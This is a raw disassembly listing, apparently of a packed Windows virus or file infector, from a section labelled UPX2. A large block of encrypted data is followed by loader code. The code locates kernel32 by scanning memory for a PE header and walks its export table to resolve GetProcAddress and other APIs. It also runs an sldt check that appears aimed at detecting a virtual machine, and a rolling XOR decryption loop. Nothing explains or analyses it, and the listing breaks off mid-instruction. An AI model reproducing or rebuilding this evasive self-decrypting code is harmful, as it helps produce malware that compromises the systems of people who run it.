57E1B463h, 49C98D79h, 6C0944F2h, 6960215Dh, 0B812B562h dd 0E156017Dh, 99D51148h, 0F1A7D4D0h, 746C71EDh, 89335900h dd 2F0FB98Dh, 94E65E62h, 393587F1h, 0CBC18EFDh, 985591CCh dd 69A47131h, 78DDA52Dh, 0B685C13Ch, 19A02D98h, 3921A01Dh dd 0E9F5316Ch, 89AFD5F6h, 8540EE1Fh, 6C25216Bh, 0F440286Dh dd 0C916C9D5h, 6580AE8Dh, 0C265E1A8h, 50C8320Fh, 945C1E0h dd 9CD8B8B8h, 69E5FCB0h, 71200E7Dh, 0CC85810Bh, 6211DECDh dd 22E5211Ch, 0B97E3D2Dh, 0C4A3182h, 99950C24h, 0D168E49Bh dd 933471EDh, 0A3042BBDh, 0CD80AE8Fh, 0AA65E1ABh, 0BD7A4E15h dd 94580EFh, 7CC01C5Eh dd 3A5A1C0h, 86E6A33Dh, 9B3C5A8h, 5655540Dh, 0A9E5D398h dd 3F48BC6Dh, 38C54160h, 6369F945h, 7D4D9EA2h, 0A73571ADh dd 0FD8CA796h, 4CEA05A9h, 29259405h, 24E10C60h, 8F481BDh dd 0E6AF0C25h, 4DE16A22h, 7155303Dh, 4DA18536h, 529D31CCh dd 0F9ED0559h, 0B9F53485h, 0BFEB247Dh, 66821135h, 0A91035C8h dd 0F5F1F2ADh, 0E903067Bh, 0C494C400h, 290FA1DDh, 39759085h dd 0F616D3FDh, 59638158h, 4DD96CDDh, 0EC4AA639h, 49C5F465h dd 53ADD5CBh, 0F9E54B5Dh, 2C0A623Ah, 8985376Dh, 2458F74Eh dd 0E9657CFFh, 0F55D71C7h, 9E0541BDh, 0C980AEDEh, 1465E1ABh dd 3975B1E1h, 0BCC8CC88h, 1915A783h, 51E86C50h, 0B79EF16Dh dd 1FD4C157h, 55002E5Eh, 2AE5612Bh, 968B3195h, 43B8AECh dd 0D9E35FF8h, 1B28D15Dh, 99250403h, 36FFB955h, 0CE673072h dd 5EE8A87Eh, 0B29F5AECh, 848BAA32h, 5963DF70h, 0EE0112DDh dd 2A0C1ADAh, 7F8554C2h, 0E415D14Dh, 0A9A5346Ah, 0D1DF456Ch dd 89C5744Dh, 0AC6984B2h, 54A5611Dh, 0F97549E0h, 0E1435BDh dd 99083808h, 2965A19Dh, 74F077EDh, 945C1C5h, 0E6ABC724h dd 0E9202622h, 79B5B138h, 1405C13Dh, 5495D5CFh, 0C7C56E17h dd 999B5E02h, 0E5E56712h, 0B8B07724h, 9D052E7Dh, 0D9501CC4h dd 0AA252EC9h, 0BB703DE8h, 4C11C0EFh, 197FBCCCh, 2965A1DDh dd 6C26B182h, 1BC08CB0h, 0BD4960Dh, 68EBA459h, 3CC7DB00h dd 0DD8B4471h, 0CA865401h, 0E1E57811h, 0E0A5612Ch, 8D4B007Dh dd 894D148Dh, 0A87122D8h, 0F93925E3h, 4704D5EEh, 5E1BD889h dd 468A1C7h, 6D34C6C7h, 7CC89BEh, 15D4D14Ah, 28E1E151h dd 37F4F174h, 0C08B0179h, 9581590Ah, 0FBAA675Dh, 0F0A7776Dh dd 9A410F38h, 8E15388Dh, 0F37128DCh, 0B1425B80h, 900D3F8h dd 1910C38Ch, 2530EE84h, 7027F7EDh, 1AC18FB8h, 16F6D112h dd 69A4A450h, 30B5A544h, 0C091016Eh, 99D45400h, 0FAE27534h dd 0EDB47D6Dh, 0E3284038h, 0C9F2F5A9h, 0F3AE18EAh, 96C12860h dd 39C3B5B4h, 1EC44B08h, 0C4EFB49h, 5962C385h, 0CC5F3BFEh dd 6913E53Eh, 29EB3857h, 3B0C7C4Ah, 0B396E063h, 7B99FD31h dd 517DB22Fh, 99D5114Dh, 0E925615Dh, 0F93571ADh, 0C90541BDh dd 0D915518Dh, 2965A19Dh, 3975B1EDh, 94581FDh, 195591CDh dd 69A5E1DDh, 79B5F12Dh, 4985C13Dh, 5995D10Dh, 0A9E5211Dh dd 0B9F5316Dh, 89C5017Dh, 99D5114Dh, 0E925615Dh, 5F90F2CDh dd 0C9050184h, 0E0BFF40Eh, 2665A1DDh, 0B461F25Ah, 0BE4A99AEh dd 0C9569786h, 4D81A556h, 0BB9B306h, 41C7FA24h, 1B1EC57Eh dd 0A5A70A09h, 8053A4E4h, 0C4C013Dh, 999528E7h, 2BA664B6h dd 98EC9385h, 4105457Fh, 9937A608h, 2901499Dh, 261DB1EDh dd 844581FDh, 5977B548h, 719CB8DDh, 0B936FD59h, 0B6722339h dd 19AC5F88h, 7012E21Dh, 9B02BC6Eh, 9926013Dh, 162961B2h dd 0EDCDE25Dh, 64BC874Fh, 0C9456399h, 0AD156B0Eh, 2A578A98h dd 77F8A19Fh, 571ED901h, 6D55AB4Eh, 82971ED9h, 69C70E2Eh dd 0B67A96D5h, 725BFAF2h, 0E9DC8B90h, 0F2F6696Dh, 0C4AC249h dd 999528DFh, 0D0ABE49Ah, 0F93571EDh, 0F5ED41BDh, 5215518Dh dd 695C2F18h, 0CE0059EDh, 11AD7E02h, 9A5591CDh, 299C6F60h dd 71C0F12Dh, 6B255CB4h, 0C57ED14Dh, 906BACE2h, 3636312Dh dd 0C9FC93F8h, 1740984Dh, 1252164h, 0F93571AEh, 42C6888Eh dd 0D915D11Eh, 0C48DF39Dh, 3A8A4E13h, 497C2B68h, 9A8392CDh dd 66A5EDA7h, 79B4F6A9h, 59FF423Dh, 0A411DE0Dh, 22E5211Dh dd 51A53D2Fh, 763AFFB5h, 0A07F944Eh, 2F26611Dh, 793DFBFDh dd 0D0714144h, 0AD3BA80Dh, 0D88EE19Eh, 0B874F966h, 0D69A5E1Ch dd 5DAC1012h, 1CA5AD91h, 0B19EA8C1h, 467F38BEh, 59956682h dd 0D164471Dh, 0B6C70293h, 89C5AAF8h, 0A356474Dh, 6220145Dh dd 0FBDE61E7h, 38064B36h, 2767B9DCh, 9C665E62h, 39358847h dd 71850450h, 9DD19E36h, 96A5E1DDh, 398C5B98h, 1C6D913Dh dd 5A6A2EF3h, 0E9DC8B98h, 1370BE6Dh, 8AC54144h, 1A863549h dd 3216639Dh, 1A3DC7A2h, 0E9CCC1AFh, 0FD3190DEh, 0D798899h dd 6251BDC4h, 88AC6ABDh, 0A2829E36h, 0E89B9500h, 17F059D6h dd 0C8B3B5E6h, 0F8AE88F6h, 28CB55E2h, 0CD7E796h, 8E375D1h dd 0C13C82B6h, 683B15AEh, 0A1DC0C56h, 4813354Eh, 0FC2A1776h dd 0A86BD57Ch, 1C4A8116h, 0F643F51Ch, 596C0358h, 184CBADDh dd 274A0ED2h, 0A09103BEh, 0A66A2FE2h, 0AD8F22DEh, 4FE0D935h dd 1C4DFE82h, 9995359Ch, 0F114D93Bh, 1DF593AFh, 0AFE743BEh dd 81133B26h, 0D6905B75h, 31B73212h, 0C2F507Ah, 0ECB87995h dd 93251E22h, 0C9BE822Eh, 9800C36Dh, 0F3959129h, 0C18F06F6h dd 43759B35h, 39DD747Eh, 6C18F95Ch, 0E89D9EA2h, 7D3571ADh dd 1808356Fh, 32DFAF6Dh, 91604A6Bh, 0B975B1EDh, 0CAFA6356h dd 2D692C40h, 0EC52E19Dh, 79F5C51Ch, 0C985C13Dh, 3925D279h dd 9860D6B7h, 0BAF57159h, 86C4017Dh, 99D5E7C9h, 6270D95Dh dd 529E9941h, 0F093FC34h, 31A551CDh, 0AC920A37h, 393585DCh dd 84581FDh, 20CF2C44h, 22D1E19Dh, 4D8474DAh, 4985C17Dh dd 3E2DD30Dh, 0DCD3DE79h, 0DD928968h, 0EF6E2FF6h, 0FFD511F5h dd 592615F6h, 7CC2DBF0h, 0C945758Ch, 0D115518Dh, 21082C25h dd 0CE63C4EDh, 4971B078h, 195591CDh, 0AC2659D9h, 7CC1F125h dd 0B1684285h, 0AEDA7A0Dh, 0E9D11098h, 0B9F5326Dh, 39C1757Dh dd 127EBBA4h, 0A91CF7D8h, 0D2FAFAADh, 354DC875h, 0ED24D47Ah dd 2966A1DDh, 6601B1EDh, 0F621E645h, 87E818FBh, 0C2A5A1E4h dd 1EB5F195h, 0C03D6A59h, 0F295D12Bh, 561B9CF5h, 51D58192h dd 763AFDB2h, 21B328AEh, 424374A2h, 6CBEDA3Ch, 0C945758Ch dd 1BE2837Ah, 2965A19Eh, 0AE9DA598h, 0B9BA7E03h, 0E5FC79D2h dd 0D1C31E22h, 0D2D3E4D2h, 860E6AACh, 600B5486h, 61CE215Dh dd 4E0979E4h, 0C9F130F8h, 99D5154Dh, 5137155Dh, 31CBB184h dd 90DF916h, 61BE55F9h, 4E8E59E8h, 8F04646h, 145C1C9h dd 6C5591CDh, 46186197h, 79B5B119h, 603D8049h, 535CF815h dd 0E9D10AB8h, 0BA11F16Dh, 0BDEEA477h, 297E110Dh, 6CAFCBECh dd 0F9754582h, 0C345F117h, 99217A08h, 91030B9Dh, 0BC824C0Fh dd 905B5CCh, 195591DDh, 2015E6A9h, 0C0D9787h, 0F92EA7C1h dd 99A67BE5h, 2B58A8B6h, 4EF57154h, 0C9F130F8h, 99D5314Dh dd 592C145Dh, 0D0B07BF5h, 63050189h, 1994E9EBh, 1D54246Ah dd 3935B1ADh, 0A3181FDh, 137D554Dh, 2991C878h, 0F01E972Dh dd 9BC4780h, 0DC627A0Dh, 0A9A5152Ch, 0F9F5316Dh, 0D9750808h dd 0ADFC944Fh, 1E8F611Dh, 0B9014028h, 0C905C1BDh, 691E248Dh dd 3E0AB25h, 9375F1D9h, 0B123BC16h, 9CA289FCh, 69E5D5ECh dd 79B5F02Dh, 6035C349h, 6DBF7407h, 4D25215Dh, 93503B6Eh dd 0EFC54149h, 186D77E6h, 0D8A096ADh, 0F9353199h, 0BC0541BFh dd 0D3DDE58Fh, 69518B38h, 0B0DED7EDh, 497C2340h, 3D6929CDh dd 9E0EE1DDh, 3981C0A8h, 4985C93Dh, 0AEF9A50Dh, 0E9D11098h dd 0B9F1316Dh, 39CE747Dh, 0B2501BF5h, 43252169h, 7CC23C46h dd 0C945758Ch, 0D915598Dh, 9103B0E8h, 9C7F516Eh, 905B5D6h dd 0D9663AABh, 0FB00A77h, 73ADD895h, 9B1EA98h, 5A71110Dh dd 9DCE8417h, 1293312Dh, 0BDF4848Ah, 89D5110Dh, 5143615Dh dd 0FA41B12Ch, 0C30D853Dh, 99217A28h, 26CEC79Dh, 0D5A345Bh dd 0FEEE81BDh, 5961A048h dd 69A5E1DDh, 0C9BC856Dh, 6000C36Dh, 0F3959139h, 9DD4A4EAh dd 99F5312Dh, 0F75017Dh, 9DD11338h, 63DB2ED0h, 0B9015808h dd 4388C8BDh, 0BF1511B4h, 2C992136h, 39C5B698h, 49BACE7Dh dd 28D06667h, 69A5A1E9h, 1FB5F16Dh, 3CB4A785h, 3FBC650Fh dd 0A3FD91B6h, 0F9C11AE8h, 8A25C17Dh, 6E5DA1E7h, 0A91150D8h dd 0F9B571ADh, 790734BDh, 0F0B0DB0Bh, 4F65E1A9h, 3C893146h dd 9F58688h, 59AADE4Dh, 58201677h, 79B5B119h, 3C85C03Dh dd 53D56106h, 0E9D10898h, 0B61E9B6Dh, 4946B91Bh, 0ADFCB447h dd 4243611Dh, 0E9F701Dh, 89317038h, 0DB15518Dh, 0DE4AD49Dh dd 79418068h, 0D4581FDh, 0A94FE4CDh, 4220EB1Dh, 0F3B5B119h dd 9B1F198h, 4975100Dh, 2883997Bh, 52F581C6h, 8385B175h dd 0D9E13AC8h, 6CD2CB5Dh, 0F975459Ch, 0C90D41BDh, 617341F8h dd 8C6F491Eh, 393585C7h, 8F52A9Bh, 51E59926h, 5D8F64D7h dd 8E1FF16Dh, 9B1F0B8h, 4995D10Dh, 0DC90901Dh, 3A4D5748h dd 0A3600B85h, 0FFD55179h, 43E552F6h, 0C0BFCC84h, 4CF241FDh dd 0D95565BCh, 2945A19Dh, 4EC4AE98h, 0B1239A16h, 0BC5F89C4h dd 69E5D5F7h, 73B615EDh, 9B1EB98h, 703EB70Dh, 0E9DCABA0h dd 3334BB6Dh, 0C9FC8BD8h, 297E774Dh, 0C0A06305h, 53353199h dd 0FD34C44Ah, 0D91651CDh, 0AD6AA09Dh, 3975B16Ah, 8221E645h dd 28D81AEBh, 0E8A5A1E9h, 79B5F1DCh, 4944363Fh, 2C96D10Dh dd 0CD829918h, 15E1FEAh, 89C5017Dh, 9FA0BA2Bh, 0CAED93Bh dd 9D8DDACBh, 6203CEDAh, 727391BEh, 1D54246Ah, 3975B1ADh dd 493080FDh, 2D64143Ah, 69A5E19Dh, 5FC1F92Dh, 2508795Bh dd 6DA454FAh, 0A9E5215Dh, 2CFA336Dh, 0EF240BBCh, 0EC1C95E6h dd 0CD9D0755h, 129E17A9h, 630DF1AEh, 61735F66h, 0AC67FCC5h dd 393585C6h, 0AAE2A9Bh, 0EEFF587Dh, 2991D058h, 79B5F12Dh dd 0F9A5B5BDh, 7010FB0Ah, 68E56129h, 30F82B8Dh, 8BC52575h dd 0D9E138E8h, 0EAC1A15Dh, 5231B52Dh, 0AFAF200Dh, 0D3F5AE35h dd 69518838h, 0CEDED7EDh, 4971B078h, 1955B1CDh, 9EF695DDh dd 3981C0A8h, 4985C13Dh, 0AE98A52Dh, 0A9E522DAh, 9F0456Dh dd 7A2EABEDh, 145ED6C6h, 0E96558DFh, 0B8BCB086h, 0C35DF141h dd 99217808h, 0AC920B9Dh, 393585DCh, 90581FDh, 0A1339DB9h dd 0ECAF228Dh, 79F5C504h, 0F1E3CBD6h, 0FC9F31F2h, 0A9A51534h dd 3C029A0Bh, 8985354Ch, 98D5114Eh, 6CD21229h, 0F975459Ch dd 0E90541BDh, 1EE25CF9h, 2965A19Eh, 0A9C5B499h, 82B66A57h dd 83D01A02h, 42A5A1E4h, 85FD78E5h, 0CC72080Eh, 59D5E53Ch dd 0A965211Dh, 3C783F18h, 89853554h, 199519C7h, 115662A4h dd 0BDF87520h, 8055199h, 52A5596Dh, 4F634236h, 5FB58055h dd 86FDE756h, 19EDF94Dh, 88A7E1DDh, 0D2ED5A4Bh, 4FF008B8h dd 99A4696Bh, 6A558A7Bh, 8570BCC7h, 7EC54149h, 0D9E120C8h dd 0E925615Dh, 0AE3304BDh, 225DB996h, 0F146DA94h, 0F94E59B6h dd 0D73C66h, 9C4481BDh, 1915A84Fh, 2D2ED8DCh, 0C43CF509h dd 49C5D150h, 60136C86h, 2CCE215Dh, 0B9B508EFh, 0BDF4848Ah dd 9995110Dh, 0EB51615Dh, 3B9EA95Ah, 9E5341B9h, 0E0BBEC0Eh dd 2665A1DDh, 39746869h, 94869FDh, 5C1E91CDh, 25E0AF8Fh dd 3D9BC31Eh, 0B6858D71h, 19A05998h, 1760A81Dh, 0EAF57154h dd 8AF959F6h, 0B1A6EE95h, 11122D6h, 6CA8751h, 0F0A3D436h dd 0DA4E51CDh, 0ACECADDFh, 3935882Fh, 804DC3FEh, 596C5748h dd 41D66ADDh, 793542D2h, 9C6DC13Dh, 0D26A2EFBh, 0E9DC87A0h dd 701D676Dh, 23AFE8Bh, 0D9ECB7D8h, 0E16FEA5Dh, 0D2393BAEh dd 0CCECC273h, 0D875D982h, 0AD6AA19Dh, 3975B0B7h, 30EF34FEh dd 0AC56918Dh, 69E5D8AFh, 765DCD81h, 498563B8h, 5DD35C0Dh dd 9097A436h, 0BFF6312Dh, 7F43E92Dh, 2456EEB2h, 0E96558FBh dd 0C23E04ADh, 4A0A4DFAh, 0D9155096h, 0BC5CAD76h, 3935884Bh dd 84804F2h, 9C5691CDh, 69E5D8AFh, 868D704Bh, 0B500CE18h dd 0D295D10Dh, 0EACE235Dh, 0F01D6159h, 0B03AFE8Bh, 0D9ECB7F0h dd 0DA06E5Dh, 0FA3571ADh, 893CEB38h, 0AB90528Dh, 0A265E1A4h dd 35329AEDh, 98803F2h, 5E6E91CDh, 0AD26EED5h, 0FAB5F12Dh dd 0E86C3FDh, 2B10D219h, 0FBE56124h, 740CE3Dh, 76C54144h dd 0D9E059D8h, 29A03B5Dh, 0F982F4A2h, 55EC41BDh, 0E515518Dh dd 0BDE0AE62h, 0B975B1EDh, 8C4A94C3h, 19559146h, 42A4A756h dd 91E5C56Eh, 0B67A34E5h, 60336C34h, 0DE90215Dh, 805FB46Eh dd 0CC6013Dh, 9995283Fh, 0D0EFE4D4h, 0F9BE71EDh, 0F0C7C486h dd 0D16751CDh, 10A324A6h, 5007B1ADh, 94581C0h, 0F162E3BDh dd 69A5E1C2h, 0F249BFA0h, 4A87EAFCh, 0DCAEC14Fh, 0A9A518D7h dd 7D763D18h, 6F4FE6Dh, 0F8C93509h, 66E67AB6h, 0B90CE328h dd 7C8E21BDh, 0D95568FFh, 0D693D775h, 39DCD012h, 7CC581FDh dd 1512BAC3h, 2E9EE8AFh, 4537FE25h, 7A3EC2h, 0A7275402h dd 956EDEE2h, 8852B049h, 76C50159h, 72AAEEB2h, 0CD6FE061h dd 193571CDh, 42C572F3h, 5C927581h, 29259833h, 1D400860h dd 8C4681FDh, 1915A8BFh, 270044BBh, 3BB63706h, 45C7EA29h dd 0B16E97CBh, 0A9B7A0DAh, 0B9F0316Dh, 0CF4C017Dh, 5A8B4EB1h dd 0D16BD4D0h, 66371EDh, 89303D28h, 26EDD28Dh, 29DE2592h dd 0BCFCB1EDh, 905B8AFh, 0E60391A7h, 29905548h, 7675742Dh dd 498565B9h, 955FA0Dh, 0F9E64B4Dh, 0B99D3007h, 0DF05017Dh dd 0AC8984B2h, 11A6611Dh, 0C7B17E52h, 400541B8h, 992C0708h dd 73E82C9Dh, 0B475F1D4h, 497CE368h, 7307C0CDh, 0FC5AB1DDh dd 79F5C4A9h, 467A39BEh, 5990DD89h, 56E54B1Dh, 0F9CC67D8h dd 950FE7Dh, 1AD55178h, 6D2A9EA5h, 0F9357558h, 0F06FC434h dd 102651CDh, 7934629Eh, 6871DBBCh, 30133402h, 8CAA918Dh dd 69E5D4BDh, 0FDBA31A8h, 4985C5ECh, 0DC1C183Eh, 0A9A51873h dd 0D1A4603Ch, 89CA0162h, 3940EE1Dh, 6C252168h, 73B17E6Dh dd 400541B9h, 992C2308h, 0E4DD629Dh, 0B275B184h, 8CB2B9B6h dd 1915A5FCh, 79A5E1DDh, 0FCB6F758h, 49C5D150h, 9896033Eh dd 4812D0EAh, 808FB4E4h, 0B27D013Dh, 12D51169h, 6C265D16h dd 0F97561C0h, 806938Eh, 38E2A07Ah, 10132414h, 36B6B1ADh dd 0F043CA4Ah, 4AD8A42Eh, 2A12EEC5h, 3065F239h, 4AAD0056h dd 6AF50DDh, 508B486Ah, 0C3762C19h, 69B70071h, 12E95AC6h dd 0AB26751Fh, 0B171FCBDh, 0EADCB642h, 0B3906A4Ch, 0EA65E1A4h dd 2951E566h, 8BCA41CEh, 19559175h, 826A6A1Eh, 37087C26h dd 0B5858105h, 90A60E86h, 0DB841DB1h, 0CE8F0D6Bh, 23E52D7Fh dd 75A14D71h, 34514F61h, 11407191h, 0C88E885Eh, 9C4D14B0h dd 146ED59Dh, 3927F2BEh, 0F67604F2h, 1ADE6E32h, 27ECB6E0h dd 5F31FE6Eh, 747A3EC2h, 17C0925Ah, 56FEA512h, 0EEC8CE92h dd 86F7323Eh, 662A01C9h, 0BA755CA2h, 7D3A3EF9h, 36FABEB8h dd 0F4FD8ABEh, 269A5E63h, 0C68B4969h, 0E197B202h, 195591DBh dd 965A8E35h, 79B519D2h, 0C8D8C13Dh, 19BA5BE0h, 0AAD8C81Dh dd 4691316Dh, 0FB708A4Fh, 0FDD55174h, 684343D4h, 0F66F3C93h dd 0C9066738h, 0E54BDA8Dh, 0A8037F9Eh, 3630E1D6h, 9469778h dd 0F1666CDh, 69A5C1DDh, 7ABC7422h, 0A73C13Dh, 171ED351h dd 55612E3Dh, 5AF5316Fh, 883C8071h, 96D5114Ch, 0E9278FDBh dd 7F899ADh, 4B0ABE42h, 0D915536Eh, 2A75EB16h, 39CDBDA7h dd 584580FDh, 0E6BF7F25h dd 4630D122h, 0C8B5B119h, 7930F11Dh, 33959139h, 0F12CDF3Dh dd 6D1D2515h, 0C3AFE97h, 5B411E9Fh, 7C14838Eh, 0F975459Ch dd 0CF6DA456h, 8015518Dh, 2965A7F5h, 8D9DE9EDh, 83BA7E17h dd 5961B848h, 432167DDh, 79F5C504h, 7DAC44B5h, 0B977D14Dh dd 9DD4A4EAh, 0B9FD312Dh, 80B0017Dh, 0ADFEACCDh, 9D24611Dh dd 0C8B08668h, 0CA050189h, 0AD14518Dh, 0D82186h, 3C75F1D9h dd 0B4C53189h, 1915A5E7h, 0E90295D8h, 3981DA90h, 0D7F1C43Dh dd 6DA454FAh, 0A9E5215Dh, 0B081B16Dh, 0BDECBCFDh, 0EED7110Dh dd 4780E2D4h, 0F9353194h, 36F1CE55h, 24D5B972h, 0C8D5E62h dd 0B275B1EFh, 497CF760h, 0E58B79CDh, 0EDAA1E22h, 79B5F326h dd 70F774B6h, 71ED14Dh, 413B2221h, 460ACCB2h, 88308372h dd 0D354114Dh, 0E9250179h, 0ABCBFA4Dh, 0DD7F42EBh, 2E052B8Eh dd 69519018h, 3975B1EDh, 844BF4EDh, 5961AD78h, 4286ADDh dd 8AB5B13Dh, 463C9699h, 0D495D104h, 0E9F521A8h, 850C26Dh dd 7AC7E27Dh, 0A850E6E9h, 0E9252169h, 0F62571ADh, 0C905E939h dd 0F166AE8Dh, 0D694CE75h, 9FE03A12h, 8C45C1C4h, 8BD19E1Fh dd 0E2A5E1DDh, 398C8398h, 59CF4A3Dh, 39B19B8Ch, 8205211Dh dd 0BB863927h, 0FBC6C84Eh, 0F4582A59h, 6225214Dh, 0B9251C20h dd 425333BDh, 7C9675B1h, 2925B1F0h, 54D232EDh, 94581FDh dd 185DEB46h, 9EA6E997h, 0FC3E06AAh, 49C5F8BBh, 6DA454FAh dd 0A9A5215Dh, 0BB81316Dh, 0FBC6198Ah, 10E53841h, 0A91CCFE8h dd 0D146FAADh, 4CF271BCh, 0D95565BCh, 2965A1DDh, 2182B399h dd 0F5F169ACh, 0F20C6E32h, 41D6E2D1h, 28B98306h, 1621326Bh dd 65205C54h, 5AE56129h, 0B6AB6EC9h, 0E48934Ch, 99D5109Fh dd 0DD0AF467h, 0FF4071EDh, 9F7D93D4h, 899D43B9h, 0F6A94962h dd 0B22F4E12h, 43468DB7h, 28D066DDh, 69A5A1E9h, 0F4A5F12Dh dd 5AF0C77Ch, 603B5C84h, 2CE6215Dh, 0B9B52100h, 89A8A6FEh dd 0B2D5114Dh, 5CDA491Eh, 0F97548D3h, 0C957C634h, 9F9A518Dh dd 18E056BDh, 3975F1D9h, 7DC581FDh, 3EBDC3CAh, 335A1E24h dd 401B7CA6h, 4A66C17Dh, 0D2BD9A84h, 2C6E3157h, 0B9B5081Bh dd 0FACD4B44h, 919F984Eh, 6A35235Ch, 723529CEh, 893C3B38h dd 0FD29398Dh, 6B64A19Dh, 7A74E8E5h, 26D00BADh, 0EE55D1F9h dd 2991D058h, 79B5F12Dh, 4A83B52Dh, 1985BC80h, 5EE5971Dh dd 0F9C100E8h, 8BC5017Dh, 67C1644Dh, 0D8A0969Bh, 0F9353199h dd 0BC0545BDh, 0E9A0DB8Bh, 0DE65E1A9h, 79418068h, 90581FDh dd 935EE4CDh, 0C367E3DAh, 8E57272Fh, 4E0FC8D6h, 5B3F133Fh dd 9A12C3CBh, 9B7E55BFh, 0D1C78E19h, 0A083ACCEh, 0E625611Dh dd 6CEF929h, 0BBB0BE42h, 261511B4h, 69506508h, 57C04EEDh dd 0F645C1C4h, 5960AD58h, 33286CDDh, 0F4B5B114h, 9BCA3A8h dd 33C7800Dh, 0FF50DE1Dh, 46F57154h, 0C9F0B9E8h, 0CF60EE4Dh dd 16252164h, 0B9004D38h, 87B0CCBDh, 261511B5h, 695CF328h dd 0AC8AE7EDh, 905B449h, 2003344Eh, 0AAA5E19Dh, 79B5F1C5h dd 48EF9C3Dh, 6ADC3C8Ch, 59BD215Dh, 3970F062h, 0CC54168h dd 5156D28Dh, 282A91A2h, 0B920F128h, 0D93882BDh, 0AC157B8Dh dd 55E4C781h, 4819BDC9h, 0E1259288h, 0E6AA6E09h, 174DE4A8h dd 914A0ED6h, 0B67A3EEFh, 746AFF6Ch, 0BBD17765h, 0B9F514D5h dd 2C2D617Dh, 0EC2AEEB2h, 0CD61EA64h, 0B780FC9Dh, 42050185h dd 587359DDh, 5A67A7A7h, 391DE7C8h, 82457EFDh, 4B55FB09h dd 91301E8Dh, 0FAB5B118h, 7704C9F9h, 5AAEE51h, 6F662268h dd 42DED969h, 0F62DFE82h, 0F82AEEB2h, 0E951D99Eh, 48DE71ADh dd 0C9056E05h, 0D905B98Dh, 9A7A19Dh, 394509EDh, 0AAD81FDh dd 0DB5591CDh, 3D28E1F9h, 5778FD09h, 358539BEh, 597DB114h dd 22E5211Dh, 0E4C51539h, 64441BF6h, 9995255Eh, 16C058B5h dd 0FDF71052h, 0CA0740BDh, 0F810568Bh, 66E8029Fh, 0AD34DEADh dd 0B11063A1h, 1A20h dup(0) ; --------------------------------------------------------------------------- call $+5 cld mov eax, [esp] mov ecx, [eax+29ABh] mov [eax+32F3h], ebx and ecx, 400000h mov ebx, [esp+4] jz short loc_3143104D pop ecx mov [eax+32F7h], esi mov cl, [eax+29AFh] mov [eax+32FBh], edi cmp cl, 0E8h jz short loc_31431041 mov ebx, [eax+29B1h] jmp short loc_3143104B ; --------------------------------------------------------------------------- loc_31431041: ; CODE XREF: UPX2:31431037j mov ecx, [eax+29B0h] mov ebx, [ecx+ebx+2] loc_3143104B: ; CODE XREF: UPX2:3143103Fj mov ebx, [ebx] loc_3143104D: ; CODE XREF: UPX2:3143101Fj push ebp mov ebp, eax sub dword ptr [esp+4], 8E05h sub ebp, 101005h mov edi, [esp+4] lea esi, [ebp+1039BCh] mov ecx, 0DBh rep movsb sldt cx test ecx, ecx jnz short loc_3143107B or eax, 0FFFFFFFFh int 2Eh ; DOS 2+ internal - EXECUTE COMMAND ; DS:SI -> counted CR-terminated command string loc_3143107B: ; CODE XREF: UPX2:31431074j and ebx, 0FFFFF000h loc_31431081: ; CODE XREF: UPX2:31431090j cmp dword ptr [ebx+4Eh], 73696854h jz short loc_31431092 loc_3143108A: ; CODE XREF: UPX2:3143109Fj sub ebx, 100h jnz short loc_31431081 loc_31431092: ; CODE XREF: UPX2:31431088j mov eax, ebx add eax, [ebx+3Ch] mov edx, [eax+78h] cmp word ptr [eax], 4550h jnz short loc_3143108A add edx, ebx mov esi, [edx+20h] mov ecx, [edx+18h] add esi, ebx push ecx loc_314310AC: ; CODE XREF: UPX2:loc_314310C0j lodsd add eax, ebx cmp word ptr [eax+2], 5074h jnz short loc_314310C0 cmp dword ptr [eax+5], 6441636Fh jz short loc_314310C5 loc_314310C0: ; CODE XREF: UPX2:314310B5j loop loc_314310AC pop ecx jmp short loc_314310F0 ; --------------------------------------------------------------------------- loc_314310C5: ; CODE XREF: UPX2:314310BEj sub [esp], ecx mov esi, [edx+24h] pop ecx add esi, ebx movzx eax, word ptr [esi+ecx*2] mov edi, [edx+1Ch] add edi, ebx mov esi, [edi+eax*4] add esi, ebx lea eax, [ebp+101137h] lea ecx, [ebp+101120h] mov dx, [eax-19h] call ecx jmp short loc_31431137 ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143117E loc_314310F0: ; CODE XREF: UPX2:314310C3j ; sub_3143117E+10j ... mov eax, [ebp+1039B0h] and eax, 400000h jz short loc_3143111C lea esi, [ebp+1039B4h] lodsd mov edi, [esp+arg_0] stosd mov ebx, [ebp+1042F8h] movsb mov edi, [ebp+104300h] mov esi, [ebp+1042FCh] loc_3143111C: ; CODE XREF: sub_3143117E-83j pop ebp retn ; END OF FUNCTION CHUNK FOR sub_3143117E ; --------------------------------------------------------------------------- retn 53DDh ; CODE XREF: sub_3143344B+2DFp ; --------------------------------------------------------------------------- mov ecx, 2879h mov ebx, edx loc_31431128: ; CODE XREF: UPX2:31431133j xor [eax], dl sub dl, bl add eax, 1 xchg bl, bh xchg dl, dh loop loc_31431128 pop ebx retn ; --------------------------------------------------------------------------- loc_31431137: ; CODE XREF: UPX2:314310EEj call near ptr loc_31431146+2 inc ebx insb outsd jnb short near ptr loc_314311A3+3 dec eax popa outsb db 64h insb loc_31431146: ; CODE XREF: UPX2:loc_31431137p add gs:[ebx-1], dl setalc mov [ebp+103E52h], eax call near ptr loc_31431162+1 inc ebx jb short loc_314311BE popa jz short near ptr loc_314311C0+1 inc ebp jbe short near ptr loc_314311C0+4 outsb jz short loc_314311A3 loc_31431162: ; CODE XREF: UPX2:31431151p add [ebx-1], dl setalc mov [ebp+103E56h], eax call sub_3143117E inc edi db 65h jz short near ptr loc_314311C0+1 popa jnb short near ptr loc_314311EA+2 inc ebp jb short near ptr loc_314311EA+3 outsd jb short $+2 ; =============== S U B R O U T I N E ======================================= sub_3143117E proc near ; CODE XREF: UPX2:3143116Cp arg_0 = dword ptr 4 ; FUNCTION CHUNK AT 314310F0 SIZE 0000002E BYTES ; FUNCTION CHUNK AT 31431524 SIZE 0000000B BYTES push ebx call esi ; lstrcatA mov [ebp+103E5Ah], eax call sub_3143154F test eax, eax jz loc_314310F0 push eax call dword ptr [ebp+103E5Ah] test eax, eax jnz loc_31431524 loc_314311A3: ; CODE XREF: UPX2:31431160j ; UPX2:3143113Fj cmp byte ptr [ebp+10152Fh], 1 jnz short loc_314311C0 push dword ptr [ebp+1042F8h] dec byte ptr [ebp+10152Fh] pop dword ptr [ebp+101588h] loc_314311BE: ; CODE XREF: UPX2:31431157j jmp short loc_314311C7 ; --------------------------------------------------------------------------- loc_314311C0: ; CODE XREF: sub_3143117E+2Cj ; UPX2:3143115Aj ... and dword ptr [ebp+101588h], 0 loc_314311C7: ; CODE XREF: sub_3143117E:loc_314311BEj and 